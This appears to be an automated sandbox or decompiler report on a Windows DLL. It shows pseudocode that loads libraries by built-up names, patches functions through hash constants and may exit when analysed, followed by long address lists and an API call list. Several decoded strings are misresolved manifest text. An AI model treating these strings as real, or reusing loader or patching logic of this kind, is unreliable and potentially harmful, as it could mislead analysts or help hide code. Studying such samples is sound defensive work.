									_t437 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
									wsprintfA( &_v568, "%s%s", _t437, _t436);
									_t626 = _t625 + 0x18;
									_t439 = LoadLibraryA( &_v560);
									M6F34049C = _t439;
									if(_t439 != 0) {
										_v952 = 0x32e7e368;
										_v948 = E6F3382F0;
										_v944 =  &M6F340600;
										_v940 = 0;
										E6F331FA0(_t439,  &_v952, 1, _t591 + 0x435a88);
										_t626 = _t626 + 0x10;
									}
									_t441 = E6F33A2F0(E6F331D50(0x77cf0c, _t601), 0, 0);
									_t560 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
									_t592 = _t441;
									wsprintfA( &_v560, "%s%s", _t560, _t592);
									_t627 = _t626 + 0x24;
									HeapFree(GetProcessHeap(), 0, _t592);
									_t446 = LoadLibraryA( &_v552); // executed
									M6F3404A0 = _t446;
									if(_t446 != 0) {
										_v944 = 0xa4a1b443;
										_v940 = E6F337EE0;
										_v936 =  &M6F3405F4;
										_v932 = 0;
										E6F331FA0(_t446,  &_v944, 1, _v952 + 0x435a88);
										_t627 = _t627 + 0x10;
									}
									_t447 = E6F331D50(0x37b4c, _t601);
									_t561 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
									wsprintfA( &_v552, "%s%s", _t561, _t447);
									_t628 = _t627 + 0x18;
									_t450 = LoadLibraryA( &_v544);
									M6F3404A4 = _t450;
									if(_t450 != 0) {
										_v936 = 0x468fa9db;
										_v932 = E6F338370;
										_v928 =  &M6F340604;
										_v924 = 0;
										E6F331FA0(_t450,  &_v936, 1, _v944 + 0x435a88);
										_t628 = _t628 + 0x10;
									}
									_t451 = E6F3331F0(0xffffffff);
									_push(0xa);
									_push(0x10);
									_push(L"15.0.");
									M6F3404EC = _t451;
									_push(E6F331D50(0x1f3ac, _t601));
									E6F338400();
									if(E6F33B820(0) != 0) {
										ExitProcess(0);
									}
									M6F340614 = 2;
									return 1;
								} else {
									goto L131;
								}
							}
						}
					}
				}
			}


























































































































































































































































                                                                                                                        0x6f33851e
                                                                                                                        0x6f338522
                                                                                                                        0x6f3394d7
                                                                                                                        0x6f3394e8
                                                                                                                        0x6f3394ea
                                                                                                                        0x6f3394f1
                                                                                                                        0x6f3394f1
                                                                                                                        0x6f3394f3
                                                                                                                        0x6f3394f8
                                                                                                                        0x6f3394fa
                                                                                                                        0x6f339501
                                                                                                                        0x6f339501
                                                                                                                        0x6f339503
                                                                                                                        0x6f339508
                                                                                                                        0x6f33950a
                                                                                                                        0x6f339511
                                                                                                                        0x6f339511
                                                                                                                        0x6f339513
                                                                                                                        0x6f339518
                                                                                                                        0x6f33951a
                                                                                                                        0x6f339521
                                                                                                                        0x6f339521
                                                                                                                        0x6f339523
                                                                                                                        0x6f339528
                                                                                                                        0x6f33952a
                                                                                                                        0x6f339531
                                                                                                                        0x6f339531
                                                                                                                        0x6f339533
                                                                                                                        0x6f339538
                                                                                                                        0x6f33953a
                                                                                                                        0x6f339541
                                                                                                                        0x6f339541
                                                                                                                        0x6f339543
                                                                                                                        0x6f339548
                                                                                                                        0x6f33954a
                                                                                                                        0x6f339551
                                                                                                                        0x6f339551
                                                                                                                        0x6f339553
                                                                                                                        0x6f339558
                                                                                                                        0x6f33955a
                                                                                                                        0x6f339561
                                                                                                                        0x6f339561
                                                                                                                        0x6f339563
                                                                                                                        0x6f339568
                                                                                                                        0x6f33956a
                                                                                                                        0x6f339571
                                                                                                                        0x6f339571
                                                                                                                        0x6f339573
                                                                                                                        0x6f339578
                                                                                                                        0x6f33957a
                                                                                                                        0x6f339581
                                                                                                                        0x6f339581
                                                                                                                        0x6f339583
                                                                                                                        0x6f339588
                                                                                                                        0x6f33958a
                                                                                                                        0x6f339591
                                                                                                                        0x6f339591
                                                                                                                        0x6f339593
                                                                                                                        0x6f339598
                                                                                                                        0x6f33959a
                                                                                                                        0x6f3395a1
                                                                                                                        0x6f3395a1
                                                                                                                        0x6f3395a3
                                                                                                                        0x6f3395a8
                                                                                                                        0x6f3395aa
                                                                                                                        0x6f3395b1
                                                                                                                        0x6f3395b1
                                                                                                                        0x6f3395b3
                                                                                                                        0x6f3395b9
                                                                                                                        0x6f3395bf
                                                                                                                        0x6f3395ca
                                                                                                                        0x6f3395cc
                                                                                                                        0x6f3395cf
                                                                                                                        0x6f3395cf
                                                                                                                        0x6f3395d1
                                                                                                                        0x6f3395d6
                                                                                                                        0x6f3395d8
                                                                                                                        0x6f3395db
                                                                                                                        0x6f3395db
                                                                                                                        0x6f3395dd
                                                                                                                        0x6f3395e2
                                                                                                                        0x6f3395e4
                                                                                                                        0x6f3395e7
                                                                                                                        0x6f3395e7
                                                                                                                        0x6f3395e9
                                                                                                                        0x6f3395ee
                                                                                                                        0x6f3395f0
                                                                                                                        0x6f3395f3
                                                                                                                        0x6f3395f3
                                                                                                                        0x6f3395f5
                                                                                                                        0x6f3395fa
                                                                                                                        0x6f3395fc
                                                                                                                        0x6f3395ff
                                                                                                                        0x6f3395ff
                                                                                                                        0x6f339601
                                                                                                                        0x6f339606
                                                                                                                        0x6f339608
                                                                                                                        0x6f33960b
                                                                                                                        0x6f33960b
                                                                                                                        0x6f33960d
                                                                                                                        0x6f339612
                                                                                                                        0x6f339614
                                                                                                                        0x6f339617
                                                                                                                        0x6f339617
                                                                                                                        0x6f339619
                                                                                                                        0x6f33961e
                                                                                                                        0x6f339620
                                                                                                                        0x6f339627
                                                                                                                        0x6f339627
                                                                                                                        0x6f339629
                                                                                                                        0x6f33962e
                                                                                                                        0x6f339630
                                                                                                                        0x6f339637
                                                                                                                        0x6f339637
                                                                                                                        0x6f339639
                                                                                                                        0x6f33963e
                                                                                                                        0x6f339640
                                                                                                                        0x6f339647
                                                                                                                        0x6f339647
                                                                                                                        0x6f339649
                                                                                                                        0x6f33964e
                                                                                                                        0x6f339650
                                                                                                                        0x6f339657
                                                                                                                        0x6f339657
                                                                                                                        0x6f339659
                                                                                                                        0x6f33965e
                                                                                                                        0x6f339660
                                                                                                                        0x6f339663
                                                                                                                        0x6f339663
                                                                                                                        0x6f339669
                                                                                                                        0x6f339670
                                                                                                                        0x6f339673
                                                                                                                        0x6f339673
                                                                                                                        0x6f339678
                                                                                                                        0x6f33967e
                                                                                                                        0x6f339680
                                                                                                                        0x6f339680
                                                                                                                        0x6f33968b
                                                                                                                        0x6f339690
                                                                                                                        0x6f339690
                                                                                                                        0x6f339692
                                                                                                                        0x6f339694
                                                                                                                        0x6f339697
                                                                                                                        0x6f339697
                                                                                                                        0x6f339699
                                                                                                                        0x6f33969c
                                                                                                                        0x6f33969c
                                                                                                                        0x6f3396a4
                                                                                                                        0x6f3396a9
                                                                                                                        0x6f3396ab
                                                                                                                        0x6f3396af
                                                                                                                        0x6f3396b4
                                                                                                                        0x6f3396bb
                                                                                                                        0x6f3396bb
                                                                                                                        0x6f3396ab
                                                                                                                        0x00000000
                                                                                                                        0x6f338528
                                                                                                                        0x6f338529
                                                                                                                        0x6f3396c0
                                                                                                                        0x6f3396cc
                                                                                                                        0x6f33852f
                                                                                                                        0x6f338537
                                                                                                                        0x6f338551
                                                                                                                        0x6f338556
                                                                                                                        0x6f338563
                                                                                                                        0x6f33856b
                                                                                                                        0x6f338578
                                                                                                                        0x6f33857b
                                                                                                                        0x6f33857b
                                                                                                                        0x6f338581
                                                                                                                        0x6f33858e
                                                                                                                        0x6f33859a
                                                                                                                        0x6f3385aa
                                                                                                                        0x6f3385bc
                                                                                                                        0x6f3385c4
                                                                                                                        0x6f3385c6
                                                                                                                        0x6f3385cc
                                                                                                                        0x6f3385d5
                                                                                                                        0x6f3385da
                                                                                                                        0x6f3385df
                                                                                                                        0x6f3385e7
                                                                                                                        0x6f3385ec
                                                                                                                        0x6f3385f6
                                                                                                                        0x6f3385fb
                                                                                                                        0x6f338601
                                                                                                                        0x6f338608
                                                                                                                        0x6f33860a
                                                                                                                        0x6f338610
                                                                                                                        0x6f338616
                                                                                                                        0x6f33861f
                                                                                                                        0x6f338624
                                                                                                                        0x6f338632
                                                                                                                        0x6f338637
                                                                                                                        0x6f33863f
                                                                                                                        0x6f33864d
                                                                                                                        0x6f338669
                                                                                                                        0x6f338671
                                                                                                                        0x6f338679
                                                                                                                        0x6f338680
                                                                                                                        0x6f338684
                                                                                                                        0x6f338690
                                                                                                                        0x6f33869b
                                                                                                                        0x6f3386a0
                                                                                                                        0x6f3386a3
                                                                                                                        0x6f3386a3
                                                                                                                        0x6f3386c8
                                                                                                                        0x6f3386d0
                                                                                                                        0x6f3386d4
                                                                                                                        0x6f3386da
                                                                                                                        0x6f3386e5
                                                                                                                        0x6f3386ea
                                                                                                                        0x6f33870f
                                                                                                                        0x6f338716
                                                                                                                        0x6f33871b
                                                                                                                        0x6f338721
                                                                                                                        0x6f338731
                                                                                                                        0x6f338752
                                                                                                                        0x6f33875d
                                                                                                                        0x6f338768
                                                                                                                        0x6f338772
                                                                                                                        0x6f338779
                                                                                                                        0x6f33877e
                                                                                                                        0x6f338784
                                                                                                                        0x6f338794
                                                                                                                        0x00000000
                                                                                                                        0x6f338796
                                                                                                                        0x6f338797
                                                                                                                        0x6f338797
                                                                                                                        0x6f338794
                                                                                                                        0x6f338731
                                                                                                                        0x6f3386ea
                                                                                                                        0x6f33879d
                                                                                                                        0x6f3387a7
                                                                                                                        0x6f3387b0
                                                                                                                        0x6f3387b5
                                                                                                                        0x6f3387bb
                                                                                                                        0x6f3387c2
                                                                                                                        0x6f3387ce
                                                                                                                        0x6f3387d3
                                                                                                                        0x6f3387da
                                                                                                                        0x6f3387ec
                                                                                                                        0x6f3387f1
                                                                                                                        0x6f3387fb
                                                                                                                        0x6f338805
                                                                                                                        0x6f338811
                                                                                                                        0x6f338816
                                                                                                                        0x6f33881b
                                                                                                                        0x6f33881e
                                                                                                                        0x6f338823
                                                                                                                        0x6f338829
                                                                                                                        0x6f33882e
                                                                                                                        0x6f33883b
                                                                                                                        0x00000000
                                                                                                                        0x6f338841
                                                                                                                        0x6f338841
                                                                                                                        0x6f338844
                                                                                                                        0x6f33884c
                                                                                                                        0x00000000
                                                                                                                        0x6f338852
                                                                                                                        0x6f33885f
                                                                                                                        0x6f338866
                                                                                                                        0x6f33886a
                                                                                                                        0x6f338878
                                                                                                                        0x6f33887a
                                                                                                                        0x6f338881
                                                                                                                        0x6f33888c
                                                                                                                        0x6f338894
                                                                                                                        0x6f338896
                                                                                                                        0x6f33889d
                                                                                                                        0x6f33889d
                                                                                                                        0x6f338894
                                                                                                                        0x6f3388a7
                                                                                                                        0x6f3388b5
                                                                                                                        0x6f3388b7
                                                                                                                        0x6f3388be
                                                                                                                        0x6f3388cb
                                                                                                                        0x6f3388d3
                                                                                                                        0x6f3388d8
                                                                                                                        0x6f3388dc
                                                                                                                        0x6f3388df
                                                                                                                        0x6f3388df
                                                                                                                        0x6f3388d8
                                                                                                                        0x6f3388e4
                                                                                                                        0x6f3388ec
                                                                                                                        0x6f3388f6
                                                                                                                        0x6f3388fb
                                                                                                                        0x6f338900
                                                                                                                        0x6f338900
                                                                                                                        0x6f338905
                                                                                                                        0x6f33890a
                                                                                                                        0x6f33890f
                                                                                                                        0x6f338912
                                                                                                                        0x6f338912
                                                                                                                        0x6f338921
                                                                                                                        0x6f338923
                                                                                                                        0x6f33892a
                                                                                                                        0x6f33892c
                                                                                                                        0x6f338943
                                                                                                                        0x6f338949
                                                                                                                        0x6f338952
                                                                                                                        0x6f338957
                                                                                                                        0x6f33895a
                                                                                                                        0x6f33895a
                                                                                                                        0x6f33896a
                                                                                                                        0x6f33897a
                                                                                                                        0x6f33897f
                                                                                                                        0x6f338994
                                                                                                                        0x6f338999
                                                                                                                        0x6f3389a4
                                                                                                                        0x6f3389a9
                                                                                                                        0x6f3389b9
                                                                                                                        0x6f3389c9
                                                                                                                        0x6f3389d9
                                                                                                                        0x6f3389e9
                                                                                                                        0x6f3389f9
                                                                                                                        0x6f338a09
                                                                                                                        0x6f338a1c
                                                                                                                        0x6f338a2c
                                                                                                                        0x6f338a3c
                                                                                                                        0x6f338a4c
                                                                                                                        0x6f338a5c
                                                                                                                        0x6f338a6c
                                                                                                                        0x6f338a7c
                                                                                                                        0x6f338a89
                                                                                                                        0x6f338a92
                                                                                                                        0x6f338aa3
                                                                                                                        0x6f338ab3
                                                                                                                        0x6f338acb
                                                                                                                        0x6f338ae3
                                                                                                                        0x6f338af3
                                                                                                                        0x6f338b0b
                                                                                                                        0x6f338b10
                                                                                                                        0x6f338b16
                                                                                                                        0x6f338b1c
                                                                                                                        0x6f338b28
                                                                                                                        0x6f338b2a
                                                                                                                        0x6f338b2f
                                                                                                                        0x6f338b39
                                                                                                                        0x6f338b3f
                                                                                                                        0x6f338b46
                                                                                                                        0x6f338b48
                                                                                                                        0x6f338b50
                                                                                                                        0x6f338b55
                                                                                                                        0x6f338b7c
                                                                                                                        0x6f338b7c
                                                                                                                        0x6f338b80
                                                                                                                        0x6f338b82
                                                                                                                        0x6f338b85
                                                                                                                        0x6f338b98
                                                                                                                        0x6f338b98
                                                                                                                        0x6f338b9b
                                                                                                                        0x6f338b9d
                                                                                                                        0x6f338ba0
                                                                                                                        0x6f338ba2
                                                                                                                        0x6f338ba2
                                                                                                                        0x6f338ba0
                                                                                                                        0x6f338b87
                                                                                                                        0x6f338b87
                                                                                                                        0x6f338b8a
                                                                                                                        0x00000000
                                                                                                                        0x6f338b8c
                                                                                                                        0x6f338b8c
                                                                                                                        0x6f338b8c
                                                                                                                        0x6f338b8a
                                                                                                                        0x6f338b57
                                                                                                                        0x6f338b57
                                                                                                                        0x6f338b5e
                                                                                                                        0x00000000
                                                                                                                        0x6f338b65
                                                                                                                        0x6f338b65
                                                                                                                        0x6f338b69
                                                                                                                        0x6f338b6b
                                                                                                                        0x6f338b71
                                                                                                                        0x6f338b75
                                                                                                                        0x6f338b75
                                                                                                                        0x6f338b5e
                                                                                                                        0x6f338bac
                                                                                                                        0x6f338bad
                                                                                                                        0x6f338b50
                                                                                                                        0x6f338bb2
                                                                                                                        0x6f338bb2
                                                                                                                        0x6f338bb8
                                                                                                                        0x6f338bba
                                                                                                                        0x6f338bbf
                                                                                                                        0x6f338bc4
                                                                                                                        0x6f338bcd
                                                                                                                        0x6f338bd2
                                                                                                                        0x6f338bd7
                                                                                                                        0x6f338bdd
                                                                                                                        0x6f338be6
                                                                                                                        0x6f338bf4
                                                                                                                        0x6f338c01
                                                                                                                        0x6f338c08
                                                                                                                        0x6f338c0c
                                                                                                                        0x6f338c12
                                                                                                                        0x6f338c1c
                                                                                                                        0x6f338c22
                                                                                                                        0x6f338c2f
                                                                                                                        0x6f338c34
                                                                                                                        0x6f338c3c
                                                                                                                        0x6f338c4a
                                                                                                                        0x6f338c4c
                                                                                                                        0x6f338c51
                                                                                                                        0x6f338c53
                                                                                                                        0x6f338c59
                                                                                                                        0x6f338c5a
                                                                                                                        0x6f338c5b
                                                                                                                        0x6f338c63
                                                                                                                        0x6f338c67
                                                                                                                        0x6f338c6b
                                                                                                                        0x6f338c6f
                                                                                                                        0x6f338c74
                                                                                                                        0x6f338c78
                                                                                                                        0x6f338c7d
                                                                                                                        0x6f338c7f
                                                                                                                        0x6f338c7f
                                                                                                                        0x6f338c92
                                                                                                                        0x6f338c97
                                                                                                                        0x6f338c9d
                                                                                                                        0x6f338cae
                                                                                                                        0x6f338cb4
                                                                                                                        0x6f338cc0
                                                                                                                        0x6f338cce
                                                                                                                        0x6f338cd4
                                                                                                                        0x6f338ce0
                                                                                                                        0x6f338ce3
                                                                                                                        0x6f338ce3
                                                                                                                        0x6f338cee
                                                                                                                        0x6f338cf6
                                                                                                                        0x6f338cf7
                                                                                                                        0x6f338d01
                                                                                                                        0x6f338d19
                                                                                                                        0x6f338d20
                                                                                                                        0x6f338d27
                                                                                                                        0x6f338d2e
                                                                                                                        0x6f338d4e
                                                                                                                        0x6f338d43
                                                                                                                        0x6f338d43
                                                                                                                        0x6f338d48
                                                                                                                        0x6f338d48
                                                                                                                        0x6f338d52
                                                                                                                        0x6f338d58
                                                                                                                        0x6f338d5d
                                                                                                                        0x6f338d63
                                                                                                                        0x6f338d64
                                                                                                                        0x6f338d65
                                                                                                                        0x6f338d6d
                                                                                                                        0x6f338d71
                                                                                                                        0x6f338d75
                                                                                                                        0x6f338d79
                                                                                                                        0x6f338d7e
                                                                                                                        0x6f338d82
                                                                                                                        0x6f338d87
                                                                                                                        0x6f338d89
                                                                                                                        0x6f338d89
                                                                                                                        0x6f338d8e
                                                                                                                        0x6f338d9d
                                                                                                                        0x6f338da5
                                                                                                                        0x6f338dad
                                                                                                                        0x6f338db5
                                                                                                                        0x6f338db9
                                                                                                                        0x6f338dc1
                                                                                                                        0x6f338dc9
                                                                                                                        0x6f338dd1
                                                                                                                        0x6f338dd5
                                                                                                                        0x6f338ddd
                                                                                                                        0x6f338de5
                                                                                                                        0x6f338ded
                                                                                                                        0x6f338df1
                                                                                                                        0x6f338df9
                                                                                                                        0x6f338e01
                                                                                                                        0x6f338e09
                                                                                                                        0x6f338e0d
                                                                                                                        0x6f338e15
                                                                                                                        0x6f338e1d
                                                                                                                        0x6f338e25
                                                                                                                        0x6f338e29
                                                                                                                        0x6f338e2e
                                                                                                                        0x6f338e2e
                                                                                                                        0x6f338e37
                                                                                                                        0x6f338e3c
                                                                                                                        0x6f338e57
                                                                                                                        0x6f338e59
                                                                                                                        0x6f338e64
                                                                                                                        0x6f338e6a
                                                                                                                        0x6f338e71
                                                                                                                        0x6f338e89
                                                                                                                        0x6f338e94
                                                                                                                        0x6f338e9f
                                                                                                                        0x6f338eaa
                                                                                                                        0x6f338eb1
                                                                                                                        0x6f338ebc
                                                                                                                        0x6f338ec7
                                                                                                                        0x6f338ed2
                                                                                                                        0x6f338ed9
                                                                                                                        0x6f338ee4
                                                                                                                        0x6f338eef
                                                                                                                        0x6f338efa
                                                                                                                        0x6f338f01
                                                                                                                        0x6f338f0c
                                                                                                                        0x6f338f17
                                                                                                                        0x6f338f22
                                                                                                                        0x6f338f29
                                                                                                                        0x6f338f34
                                                                                                                        0x6f338f3f
                                                                                                                        0x6f338f4a
                                                                                                                        0x6f338f51
                                                                                                                        0x6f338f5c
                                                                                                                        0x6f338f67
                                                                                                                        0x6f338f72
                                                                                                                        0x6f338f79
                                                                                                                        0x6f338f84
                                                                                                                        0x6f338f8f
                                                                                                                        0x6f338f9a
                                                                                                                        0x6f338fa1
                                                                                                                        0x6f338fac
                                                                                                                        0x6f338fb7
                                                                                                                        0x6f338fc2
                                                                                                                        0x6f338fc9
                                                                                                                        0x6f338fd4
                                                                                                                        0x6f338fdf
                                                                                                                        0x6f338fea
                                                                                                                        0x6f338ff1
                                                                                                                        0x6f338ffc
                                                                                                                        0x6f339007
                                                                                                                        0x6f339012
                                                                                                                        0x6f339019
                                                                                                                        0x6f339024
                                                                                                                        0x6f33902f
                                                                                                                        0x6f33903a
                                                                                                                        0x6f339041
                                                                                                                        0x6f33904c
                                                                                                                        0x6f339057
                                                                                                                        0x6f339062
                                                                                                                        0x6f339069
                                                                                                                        0x6f339074
                                                                                                                        0x6f33907f
                                                                                                                        0x6f33908a
                                                                                                                        0x6f339091
                                                                                                                        0x6f33909c
                                                                                                                        0x6f3390a7
                                                                                                                        0x6f3390b2
                                                                                                                        0x6f3390b9
                                                                                                                        0x6f3390c4
                                                                                                                        0x6f3390cf
                                                                                                                        0x6f3390da
                                                                                                                        0x6f3390e1
                                                                                                                        0x6f3390ec
                                                                                                                        0x6f3390f7
                                                                                                                        0x6f339102
                                                                                                                        0x6f339109
                                                                                                                        0x6f339114
                                                                                                                        0x6f33911f
                                                                                                                        0x6f33912a
                                                                                                                        0x6f339131
                                                                                                                        0x6f339136
                                                                                                                        0x6f33913c
                                                                                                                        0x6f339141
                                                                                                                        0x6f339146
                                                                                                                        0x6f33914b
                                                                                                                        0x6f33914f
                                                                                                                        0x6f339152
                                                                                                                        0x6f339157
                                                                                                                        0x6f33915b
                                                                                                                        0x6f339160
                                                                                                                        0x6f339165
                                                                                                                        0x6f339169
                                                                                                                        0x6f339176
                                                                                                                        0x6f33917b
                                                                                                                        0x6f339180
                                                                                                                        0x6f33918c
                                                                                                                        0x6f339191
                                                                                                                        0x6f339196
                                                                                                                        0x6f3391a6
                                                                                                                        0x6f3391ab
                                                                                                                        0x6f3391b1
                                                                                                                        0x6f3391b3
                                                                                                                        0x6f3391b3
                                                                                                                        0x6f3391bd
                                                                                                                        0x6f3391c2
                                                                                                                        0x6f3391d7
                                                                                                                        0x6f3391d9
                                                                                                                        0x6f3391e4
                                                                                                                        0x6f3391ea
                                                                                                                        0x6f3391f1
                                                                                                                        0x6f3391f7
                                                                                                                        0x6f339206
                                                                                                                        0x6f33920e
                                                                                                                        0x6f339216
                                                                                                                        0x6f33921e
                                                                                                                        0x6f339222
                                                                                                                        0x6f33922a
                                                                                                                        0x6f339232
                                                                                                                        0x6f33923a
                                                                                                                        0x6f33923e
                                                                                                                        0x6f339246
                                                                                                                        0x6f33924e
                                                                                                                        0x6f339256
                                                                                                                        0x6f33925a
                                                                                                                        0x6f339262
                                                                                                                        0x6f33926a
                                                                                                                        0x6f339272
                                                                                                                        0x6f339276
                                                                                                                        0x6f33927b
                                                                                                                        0x6f33927b
                                                                                                                        0x6f339284
                                                                                                                        0x6f33928a
                                                                                                                        0x6f33929d
                                                                                                                        0x6f33929f
                                                                                                                        0x6f3392aa
                                                                                                                        0x6f3392b0
                                                                                                                        0x6f3392b7
                                                                                                                        0x6f3392b9
                                                                                                                        0x6f3392c8
                                                                                                                        0x6f3392d0
                                                                                                                        0x6f3392d8
                                                                                                                        0x6f3392e0
                                                                                                                        0x6f3392e4
                                                                                                                        0x6f3392ec
                                                                                                                        0x6f3392f4
                                                                                                                        0x6f3392fc
                                                                                                                        0x6f339300
                                                                                                                        0x6f339305
                                                                                                                        0x6f339305
                                                                                                                        0x6f33930e
                                                                                                                        0x6f339314
                                                                                                                        0x6f339327
                                                                                                                        0x6f339329
                                                                                                                        0x6f339334
                                                                                                                        0x6f33933a
                                                                                                                        0x6f339341
                                                                                                                        0x6f339352
                                                                                                                        0x6f33935a
                                                                                                                        0x6f339362
                                                                                                                        0x6f33936a
                                                                                                                        0x6f33936e
                                                                                                                        0x6f339373
                                                                                                                        0x6f339373
                                                                                                                        0x6f339384
                                                                                                                        0x6f339389
                                                                                                                        0x6f339395
                                                                                                                        0x6f3393a6
                                                                                                                        0x6f3393a8
                                                                                                                        0x6f3393b4
                                                                                                                        0x6f3393c2
                                                                                                                        0x6f3393c8
                                                                                                                        0x6f3393cf
                                                                                                                        0x6f3393e4
                                                                                                                        0x6f3393ec
                                                                                                                        0x6f3393f4
                                                                                                                        0x6f3393fc
                                                                                                                        0x6f339400
                                                                                                                        0x6f339405
                                                                                                                        0x6f339405
                                                                                                                        0x6f33940e
                                                                                                                        0x6f339413
                                                                                                                        0x6f339428
                                                                                                                        0x6f33942a
                                                                                                                        0x6f339435
                                                                                                                        0x6f33943b
                                                                                                                        0x6f339442
                                                                                                                        0x6f339457
                                                                                                                        0x6f33945f
                                                                                                                        0x6f339467
                                                                                                                        0x6f33946f
                                                                                                                        0x6f339473
                                                                                                                        0x6f339478
                                                                                                                        0x6f339478
                                                                                                                        0x6f33947d
                                                                                                                        0x6f339485
                                                                                                                        0x6f339487
                                                                                                                        0x6f339489
                                                                                                                        0x6f339494
                                                                                                                        0x6f3394a1
                                                                                                                        0x6f3394a2
                                                                                                                        0x6f3394b2
                                                                                                                        0x6f3394b5
                                                                                                                        0x6f3394b5
                                                                                                                        0x6f3394be
                                                                                                                        0x6f3394d4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33896a
                                                                                                                        0x6f33884c
                                                                                                                        0x6f33883b
                                                                                                                        0x6f338529

                                                                                                                        APIs
                                                                                                                        • DisableThreadLibraryCalls.KERNEL32(?), ref: 6F338537
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 6F33853E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F33855A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F338563
                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 6F338570
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33857B
                                                                                                                        • PathAddBackslashA.SHLWAPI(00A4DE08), ref: 6F33858E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F338597
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33859A
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000000,00000104), ref: 6F3385AF
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F3385C1
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3385C4
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00A56008,00000033), ref: 6F3385DA
                                                                                                                        • PathRemoveFileSpecA.SHLWAPI(00A56008), ref: 6F3385FB
                                                                                                                        • PathAddBackslashA.SHLWAPI(00A56008), ref: 6F338608
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(00A56008), ref: 6F338610
                                                                                                                        • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000000,00000000), ref: 6F338637
                                                                                                                        • PathAddBackslashA.SHLWAPI(?), ref: 6F33864D
                                                                                                                        • wsprintfA.USER32 ref: 6F338684
                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,%s%s,?,?), ref: 6F33869B
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F3386A3
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A4DE08), ref: 6F3394EE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3394F1
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A56008), ref: 6F3394FE
